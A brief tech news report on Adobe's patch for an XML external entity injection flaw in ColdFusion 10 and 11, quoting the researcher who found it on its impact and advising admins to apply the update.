Adobe ices ColdFusion server admin password, file hack hole

Slap patch, no need to reboot

Adobe has patched a hole in ColdFusion that could have allowed hackers to gain access to files and passwords stored on servers.

The applications platform is used by some 30 million websites.

The XML external entities injection vulnerability triggers when XML word documents are processed, Legal Hackers security researcher Dawid Golunski says.

Attackers could have also unleashed server-side request forgeries and less-risky SMB relay attacks.

ColdFusion versions 10 and 11 are affected.

"Depending on web application's functionality and the attacker's ability to supply a malicious document to be processed by a vulnerable ColdFusion application, this vulnerability may potentially be exploited by both low-privileged and unauthenticated remote attackers," Golunski says.

"Ability to read arbitrary files could for example let attackers extract sensitive information such as ColdFusion password hashes of the management console or stored database credentials.

"This could allow unauthorised access to weakly protected ColdFusion management interfaces and let attackers upload malicious code which could be used to fully compromise the server."

Golunski supplied Adobe with a proof-of-concept exploit also posted to his advisory after patches were issued.

Admins should apply ColdFusion 11 update 10 to squash the bug. ®


Biting the hand that feeds IT © 1998–2017